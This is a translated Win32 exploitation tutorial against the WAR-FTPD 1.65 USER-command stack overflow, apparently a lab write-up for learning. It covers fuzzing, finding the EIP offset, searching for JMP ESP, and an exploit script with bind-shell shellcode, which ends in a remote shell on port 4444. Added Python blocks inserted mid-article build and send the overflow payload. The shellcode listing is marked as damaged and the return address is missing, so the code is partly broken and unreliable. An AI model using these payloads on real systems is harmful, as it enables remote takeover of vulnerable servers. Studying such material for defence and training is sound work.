Win32 buffer overflows in practice

xiaoxiao 2021-03-06

Note: this was originally a PDF document; I spent some time converting it into a text document.

Phantom Brigade overflow study material, cloie # www.ph4nt0m.org

Win32 buffer overflows in practice
Original: "Intro to Win32 Exploits", by Sergio Alvarez, 2004.09.05
Translation: ph4nt0m.org, 2004.10.30

I. Preamble

Friends have asked me many times to write an article about exploits under Win32, partly because there are plenty of such articles for *NIX platforms and comparatively few for Win32, and partly because writing an exploit for Win32 has a few tricky spots. Here I take one simple, concrete example and walk through it in detail: discovering the bug, debugging it, and writing and using the exploit. The target is a stack buffer overflow in WAR-FTPD v1.65.

First, prepare the following tools:

♦ python - www.python.org
♦ pyopenssl
♦ ollydbg - http://home.t-online.de/ollydbg/
♦ ollyuni, by FX of Phenoelit - http://www.phenoelit.de
♦ war-ftpd version 1.65, by jgaa - http://www.jgaa.com
♦ fuzzer v1.0 - http://hack3rs.org/~shadown/twister/

(Translator's note: a Win32 build of pyopenssl can be found for Python 2.2.x, so installing Python 2.2.x is the most convenient choice.)

II. Finding the vulnerability

Debugging the target live while fuzzing it lets you see what actually happened at the moment of the crash. Open WAR-FTPD v1.65 under OllyDbg:

♦ run OllyDbg
♦ File -> Open (or press F3)
♦ browse to the directory where WAR-FTPD v1.65 is installed and select the file 'war-ftpd.exe'
♦ Debug -> Run (or press F9)
♦ in the WAR-FTP window, choose the menu item to start the service

After the program starts there may be some exceptions; follow the prompts (Shift+F7/F8/F9) to pass them on to the program. Under OllyDbg (and any other debugger) the process is suspended by the debugger whenever an exception occurs, so we have to tell it to continue running.

Now that WAR-FTPD is running, use the fuzzer to hunt for bugs in it:

c:\fuzzer> fuzzer.py
###############################################
##        net-twister fuzzer module          ##
##    code by sergio 'shadown' alvarez       ##
###############################################
usage: c:\fuzzer\fuzzer.py <host> <port> <protocol>
Protocols available: SMTP, FTP, POP3

We choose FTP mode:

c:\fuzzer> fuzzer.py 192.168.178.129 21 FTP

While it runs you will see messages such as:

<**> it is suppose to recv something, but recv nothing checkit! <**>

or:

<**> Bug Found!!! ;)) <**>
-> Sending: AAAAAAAAAAAAAAAAAAAA...AAAA (a long run of 'A')

Now look at the status bar at the bottom of OllyDbg. It shows 'Access violation when executing [41414141]', and the register pane in the upper-right corner shows EIP = 41414141 (0x41 is 'A'). In other words, the USER command in the FTP authentication stage has a buffer overflow, and our long string has overwritten the saved EIP.

Next we keep debugging this bug. Every debugging run kills the WAR-FTPD process, so restart it with Debug -> Restart (and start the service again).

III. Debugging the vulnerability

Having found the bug, we can change the program's flow by overwriting EIP and jumping to shellcode we place in the buffer. To do that we need two things: how long the string must be before it overwrites EIP, and where the shellcode we send ends up in memory. This is very similar to Linux, although we will also see some parts that are specific to Win32.

As seen above, EIP is now 41414141. How long does the buffer have to be to reach EIP in memory? I wrote a simple script, 'reacheip.py', which builds buffers out of numbered groups; the number of groups and their length can be changed through parameters, so the exact buffer length can be worked out. The principle of the script, assuming for the moment that a register is 1 byte wide, is:

a. First produce a digit string such as 123456789123456789123456789...
b. Observe which digit lands in EIP (assuming EIP is 1 byte wide), say 2. Rebuild the string so that only the positions that held 2 are numbered (1, 2, 3, ... in turn); the digits at all other positions are left unchanged or blanked.
c. Now a new digit lands in EIP, say 4. Since only one position carried that digit, the true buffer length needed for the exploit can be read off from it.

(Translator's note: because the author only sketches the principle of the script here, he does not say which position in the sequence this digit 4 occupies. x86 registers are 4 bytes wide, so the digit string above is extended to groups of four identical digits arranged in the same way. During actual debugging I found that the four bytes covering EIP are not always the same digit, for example 4445, so an alignment character such as A is added at the beginning of the buffer to shift it; after that the digits covering EIP are 4444.)

Besides the buffer-building function of 'reacheip.py' we also need send/receive functions (network I/O), so 'reacheip.py' is used as a library and combined into a new script, 'reach_war-ftpd.py', for debugging war-ftpd. Its details:

c:\fuzzer> reach_war-ftpd.py
usage: c:\fuzzer\reach_war-ftpd.py <host> <port> <align> <toReach> <repeat> <cycles> <firstReached>

host:         address of the target host
port:         port on the target host
align:        number of padding characters inserted before the digit string (1-3)
toReach:      the digit (1-9) that is renumbered in the new digit string
repeat:       how many digit groups to build (for a rebuilt string, how many groups are renumbered)
cycles:       rebuild pass (1-2)
firstReached: the digit (1-9) that was replaced in the previous pass

Now the real thing against WAR-FTPD. First the initial digit string, of the form 111122223333..., repeated 200 times, so the whole string is 4 * 200 = 800 bytes:

c:\fuzzer> reach_war-ftpd.py 192.168.178.129 21 0 0 200 1 0
220-Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
buffer size: 800
331 User name okay, Need password.

In OllyDbg we now see 'Access violation when executing [36353535]'. The overwritten EIP is 36353535, which shows that the digit string in the buffer must be shifted so that the four bytes covering EIP form a whole group, 35353535. The values are shown in hex; the hex value of each letter or digit can be looked up in an ASCII table: '1' = 31, '2' = 32, '3' = 33, '4' = 34, '5' = 35, ..., '9' = 39. On a Linux system, the command 'man ascii' shows the table.

After adjusting, the digit string becomes A111122223333...:

c:\fuzzer> reach_war-ftpd.py 192.168.178.129 21 1 0 200 1 0
220-Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
buffer size: 801
331 User name okay, Need password.

This time OllyDbg shows 'Access violation when executing [35353535]', so the digit 5 is the one to renumber. Every place that held 5555 is now replaced with 1111, 2222, 3333, ... in turn, and the digits at all other positions, which do not matter, are replaced with A:

c:\fuzzer> reach_war-ftpd.py 192.168.178.129 21 1 5 20 1 0
220-Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
buffer size: 737
331 User name okay, Need password.
check in ollydbg!

This time OllyDbg again shows 35353535, that is 5555 (there are more groups of 5 than digits to number them with), so a second replacement is needed: the positions that held 5555 in the last buffer are replaced with 1111, 2222, 3333, ...:

c:\fuzzer> reach_war-ftpd.py 192.168.178.129 21 1 5 10 2 5
220-Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
buffer size: 3401
331 User name okay, Need password.
check in ollydbg!

This time OllyDbg shows 32323232, that is 2222, and with that we can obtain the buffer needed to cover EIP.

First find out what 'reach_war-ftpd.py' sent, by printing the same buffer with 'reacheip.py':

c:\fuzzer> reach_eip.py 1 5 10 2 5
Buffer size: ... (the rest of the output is not relevant here)

Then copy the buffer up to the digits that landed in EIP (in a Win2K cmd window, select the text with the mouse and press Enter to copy it to the clipboard, then right-click to paste) into the following command:

c:\fuzzer> python -c "print len('AAAAAAAA...AAAA1111AAAA...AAAAAAAA')"
485

So the length we want is 485.

A simpler way is to use 'reacheip.py' directly; the principle is the same, and with the parameters changed accordingly it gives the same result:

c:\fuzzer> reach_eip.py 1 5 1 2 5
Buffer size: 485
AAAAAAAA...AAAA1111AAAA...AAAAAAAA

Now that we know the buffer length, we can start to exploit the bug. Build a 'USER' command of the form 'USER' + 485-byte string + return address and test it, for example with the script 'trigger_deadbeef.py':

c:\fuzzer> type trigger_deadbeef.py
import struct
print 'USER ' + '\x41' * 485 + struct.pack('<L', 0xdeadbeef)

c:\fuzzer> trigger_deadbeef.py | nc 192.168.178.129 21
220-Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.
331 User name okay, Need password.

Press Ctrl+C to stop 'nc'. OllyDbg now shows 'Access violation when executing [DEADBEEF]', so we control EIP.

Next, the second step: find where the shellcode is. This is where Win32 differs from Linux. As seen above, the stack addresses look like 0x00A4FDD0. Overwriting EIP with such a value is not appropriate, because it contains 0x00 (which terminates the copied string) and so cannot be used as the return address. Looking carefully at the stack (the lower-right window in OllyDbg), we find that ESP points just past the overwritten EIP, only 4 bytes away.
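The numbered-group search described above, as an added example that is not the article's reacheip.py or reach_war-ftpd.py: it implements the same procedure in Python 3 against a constructed stand-in for WAR-FTPD whose return address is assumed to lie 485 bytes into the USER argument (the value the article arrives at). The names build_buffer, find_offset and fake_war_ftpd, and the simulated target, are this example's own.

```python
"""Find the distance to the saved return address with numbered 4-byte groups.

Added example written for this page; it is not the article's reacheip.py or
reach_war-ftpd.py, but it implements the procedure those scripts follow.
fake_war_ftpd() stands in for the vulnerable server (assumption: the return
address sits 485 bytes into the USER argument, the value the article ends up
with), so the whole search runs offline. Against a live target, crash() would
send the buffer as the USER argument and return the EIP value read from OllyDbg.
"""
import struct

DIGITS = "123456789"
GROUP = 4          # EIP is 4 bytes wide on x86, so each mark is four identical digits
RET_OFFSET = 485   # constructed: where the fake server keeps its saved return address


def eip_to_bytes(eip):
    """Turn the EIP value the debugger prints back into the buffer bytes that
    overwrote it, in memory order: 0x36353535 came from the bytes '5556'."""
    return struct.pack("<I", eip)


def build_buffer(candidates, length):
    """'A' everywhere, except that the candidate offsets get 1111, 2222, ...
    in order (digits cycle after nine). Also returns digit -> offsets."""
    buf = bytearray(b"A" * length)
    where = {}
    for n, off in enumerate(candidates):
        digit = DIGITS[n % len(DIGITS)]
        buf[off:off + GROUP] = digit.encode() * GROUP
        where.setdefault(digit, []).append(off)
    return bytes(buf), where


def find_offset(crash, groups=200, max_align=3, log=None):
    """Narrow the group that lands in EIP down to a single offset.

    Round 1 numbers every group. Each later round blanks all groups except
    those carrying the digit seen in EIP and renumbers just those, so the
    candidate set shrinks by a factor of nine per round. If EIP shows a mix
    of digits, the 4-byte overwrite straddles two groups: prepend one more
    alignment byte and start over. Returns (offset, align)."""
    for align in range(max_align + 1):
        length = align + groups * GROUP
        candidates = list(range(align, length, GROUP))
        while len(candidates) > 1:
            buf, where = build_buffer(candidates, length)
            eip = crash(buf)
            if log is not None:
                log.append((align, eip))
            seen = eip_to_bytes(eip)
            if len(set(seen)) != 1 or chr(seen[0]) not in DIGITS:
                break                       # misaligned: retry with align + 1
            candidates = where[chr(seen[0])]
        else:
            return candidates[0], align
    raise RuntimeError("could not line the pattern up with EIP")


def fake_war_ftpd(user):
    """Constructed stand-in for the overflowing USER handler: returns the EIP
    value OllyDbg would show once the saved return address is overwritten."""
    if len(user) < RET_OFFSET + GROUP:
        raise RuntimeError("no crash: buffer too short to reach EIP")
    return struct.unpack("<I", user[RET_OFFSET:RET_OFFSET + GROUP])[0]


if __name__ == "__main__":
    trace = []
    offset, align = find_offset(fake_war_ftpd, log=trace)
    for align_used, eip in trace:
        print("align=%d  EIP=%08x  (%s)" % (align_used, eip, eip_to_bytes(eip).decode()))
    print("return address is %d bytes into the USER argument" % offset)
```

Run stand-alone, the simulated search reports the same sequence the article saw in OllyDbg: 36353535 with no alignment byte (the overwrite straddles '5556'), then 35353535, 35353535 again and finally 32323232 with one alignment byte, after which a single group remains and the offset is 485. Against a live target, replace fake_war_ftpd with a function that sends the buffer and returns the EIP value read from the debugger; each call needs a Debug -> Restart first.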
This is a well-trodden path on Win32 (for a detailed analysis of the principle, see the classic articles on www.nsfocus.net): put the shellcode at the place ESP points to, and overwrite EIP with the address of a 'JMP ESP' instruction. When the function returns into that instruction, the jump lands exactly on our shellcode. But how do we find the address of a 'JMP ESP'? You can search the Internet for values for a particular system, and there are also some fairly universal addresses. Keep in mind that such an address is only valid on the exact OS, service pack and language version it was taken from: it lives inside a specific DLL, and a different build of that DLL will not have the same bytes at the same place.

Here is a way to find one on your own system, using an OllyDbg plugin, ollyuni.dll. Copy ollyuni.dll into the OllyDbg directory, then right-click in the left-hand (disassembly) window of OllyDbg and select 'Overflow return address -> ASCII overflow returns -> Search JMP/CALL ESP'. The search takes a little while; when it finishes, open View -> Log and you will see a long list of addresses. Pick one that contains no 0x00 byte. (PS: lion's sac.exe achieves the same effect.)
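Both the return-address search above and the payload assembly in the exploit section that follows, as one added example written for this page (it is not ollyuni, sac.exe or the article's exp_beta.py): it scans a module image for the opcode bytes of JMP ESP, CALL ESP and PUSH ESP; RET, discards addresses whose little-endian encoding contains a byte the FTP USER argument cannot carry, and lays out 'USER ' + 485 filler bytes + return address + pad + shellcode. The module image, its base 0x77E10000, the planted offsets and the \xcc placeholder shellcode are all constructed; send_user() is the only part that touches the network and is not called by default.

```python
"""Find a 'JMP ESP' return address and lay out the WAR-FTPD USER payload.

Added example for this page; it is not ollyuni, sac.exe or the article's
exp_beta.py. It does offline what those steps do: scan a module image for
instructions that transfer control to ESP, reject addresses whose encoding
holds a byte the FTP USER argument cannot carry, and assemble
'USER ' + 485 filler bytes + return address + pad + shellcode.
Everything marked 'constructed' is made up for the demo: the module bytes and
their base 0x77E10000, and the \\xcc (int3) placeholder that stands in for a
real bind-shell shellcode.
"""
import socket
import struct

# Opcode sequences that land execution on the stack pointer.
TRAMPOLINES = {
    b"\xff\xe4": "jmp esp",
    b"\xff\xd4": "call esp",
    b"\x54\xc3": "push esp; ret",
}
# NUL ends the copied C string, CR/LF end the FTP command line, space ends
# the USER argument: none of them may appear anywhere in the payload.
FTP_BAD_BYTES = b"\x00\x0a\x0d\x20"
EIP_OFFSET = 485   # bytes before the saved return address, found in section III


def has_bad_bytes(data, bad=FTP_BAD_BYTES):
    return any(b in data for b in bad)


def find_trampolines(image, base, bad=FTP_BAD_BYTES):
    """[(address, mnemonic, usable)] for every trampoline in `image`; `usable`
    is False when the little-endian encoding of the address contains a bad
    byte, the filter the article applies by eye on the ollyuni log."""
    hits = []
    for seq, name in TRAMPOLINES.items():
        pos = image.find(seq)
        while pos != -1:
            addr = base + pos
            hits.append((addr, name, not has_bad_bytes(struct.pack("<I", addr), bad)))
            pos = image.find(seq, pos + 1)
    return sorted(hits)


def pick_return_address(image, base, bad=FTP_BAD_BYTES):
    """Lowest usable trampoline address, or None if the module offers none."""
    usable = [addr for addr, _name, ok in find_trampolines(image, base, bad) if ok]
    return usable[0] if usable else None


def build_user_payload(ret_addr, shellcode, pad=32, offset=EIP_OFFSET, bad=FTP_BAD_BYTES):
    """'USER ' + filler + return address + pad + shellcode + CRLF.

    After the overwritten return executes, ESP points 4 bytes past the return
    address, JMP ESP lands on the pad, and the pad bytes (0x42 = inc edx) run
    as harmless one-byte instructions until the shellcode. 32 of them keep the
    shellcode clear of the 28-byte FPU environment that a GetPC stub like the
    one at the start of the article's shellcode (\\xd9\\x74\\x24\\xf4 is
    fnstenv [esp-0xc], \\x5b is pop ebx) writes from esp-12 to esp+16; a
    shellcode without such a stub needs only 4 bytes of pad. This reading of
    the article's 32 bytes is an assumption of this example."""
    body = b"A" * offset + struct.pack("<I", ret_addr) + b"B" * pad + shellcode
    if has_bad_bytes(body, bad):
        raise ValueError("payload contains a byte the FTP USER argument cannot carry")
    return b"USER " + body + b"\r\n"


def send_user(host, port, payload, timeout=5.0):
    """Deliver the payload the way 'exp_beta.py | nc' does: read the banner,
    send the USER line, return whatever comes back (nothing once the server
    has crashed). Only use against a host you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024)
        s.sendall(payload)
        try:
            reply = s.recv(1024)
        except socket.timeout:
            reply = b""
    return banner, reply


# Constructed module image: nop filler with trampolines planted at offsets
# chosen so that some addresses contain bad bytes and some do not.
BASE = 0x77E10000
_img = bytearray(b"\x90" * 0x2000)
_img[0x0010:0x0012] = b"\xff\xe4"   # 0x77E10010 -> 10 00 E1 77: NUL, unusable
_img[0x0A20:0x0A22] = b"\xff\xd4"   # 0x77E10A20 -> 20 0A E1 77: space/LF, unusable
_img[0x1234:0x1236] = b"\xff\xe4"   # 0x77E11234 -> 34 12 E1 77: usable
_img[0x1FEE:0x1FF0] = b"\x54\xc3"   # 0x77E11FEE -> EE 1F E1 77: usable
SAMPLE_IMAGE = bytes(_img)
SHELLCODE = b"\xcc" * 16            # constructed placeholder: int3 breakpoints

if __name__ == "__main__":
    for addr, name, ok in find_trampolines(SAMPLE_IMAGE, BASE):
        print("%08x  %-14s %s" % (addr, name, "ok" if ok else "bad bytes"))
    ret = pick_return_address(SAMPLE_IMAGE, BASE)
    payload = build_user_payload(ret, SHELLCODE)
    print("ret=%08x  payload=%d bytes" % (ret, len(payload)))
    # send_user("192.168.178.129", 21, payload)   # the article's lab target
```

Run stand-alone it lists the four planted trampolines, marks the two whose addresses contain 0x00, 0x0a or 0x20 as unusable, and builds a 544-byte USER line around 0x77E11234. With the placeholder shellcode the target would simply break into the debugger at ESP+32, which is the quickest way to confirm the layout before dropping in real shellcode.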

IV. Exploitation

A simple exploit script is as follows (the shellcode listing is reproduced as it survives in this copy; several lines are short or damaged, so it cannot be reused as-is):

c:\fuzzer> type exp_beta.py
import struct
sc  = "\x24\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\x57\x49\xba"
sc += "\x7a\x1d\x29\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
sc += "\x8a\x1c\xc3\x2\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"   # one byte on this line is damaged in this copy
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x88\x25\x51\x86\xe0"
sc += "\xef\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
# jmp_esp: the 'JMP ESP' address found in section III (the value used by the author does not survive in this copy)
print 'USER ' + '\x41' * 485 + struct.pack('<L', jmp_esp) + '\x42' * 32 + sc

c:\fuzzer> exp_beta.py | nc 192.168.178.129 21
220-Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready
220 Please enter your user name.

Press Ctrl+C to stop nc, then check whether the overflow succeeded:

c:\fuzzer> telnet 192.168.178.129 4444
Trying 192.168.178.129...
Connected to 192.168.178.129.
Escape character is '^]'.
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\Program Files\War-ftpd>

OK, the test succeeded ^_^.

V. Translator's postscript

First of all, thanks to the author for giving us such a detailed article. It can be called a model, with both pictures and text, and however much it is praised, I think the author deserves it. The article goes from discovering the vulnerability, through debugging it, to exploiting it, and explains how to find the buffer length, how to find the 'JMP ESP' address and how to write the exploit. For beginners, articles like this are well worth studying.

This article is also very extensible. For example, in the part that determines the buffer length, if the buffer is very long the number of replacement passes may exceed 2 (I don't know whether such a case exists); take the buffer of the ccproxy 6.0 HTTP log overflow, for which reach_eip.py may need to be modified to do a third replacement.

Similarly, the fuzzer can dig out the WAR-FTPD bug, and you can try the same method to dig out vulnerabilities in other FTP daemons; for example, the recently published Ability Server 2.34 FTP STOR buffer overflow makes a good exercise for this article. It can likewise fuzz SMTP or POP3; testing YahooPOPs 0.6 with it, you can find that SMTP overflow too. With some modification it can support other protocols as well.

The only thing not explained is the '\x42' * 32 in the exploit: while debugging one clearly sees that EIP and ESP differ by only 4 bytes, so why fill with 32 bytes? This question bothered the translator for a long time; since the author's other articles have no English version, he may well have discussed this issue in one of them. Later, with help from the Phantom Brigade, single-stepping through to see what happened, I finally understood that the 32 bytes here are actually related to the shellcode. Looking at the sc above, there is the machine code '\x5b', whose assembly is 'POP EBX'; it may be related to the values of other registers, and '\x42' is 'INC EDX'. As for exactly how they are related, please ask the masters. If you change to a different shellcode, 4 bytes of filler may be all that is needed, so keep the idea clear and don't be confused by the 32 bytes.

I translated this article over the weekend, and I am especially grateful to all the members of the Phantom Brigade. Thanks also to the netizens who helped during the translation. Where the translation is wrong, please correct it. Finally, senior ipxodi recommended an aphorism to encourage one another: "If you assume that there's no hope, you guarantee there will be no hope. If you assume that there is an instinct for freedom, there are opportunities to change things." - Noam Chomsky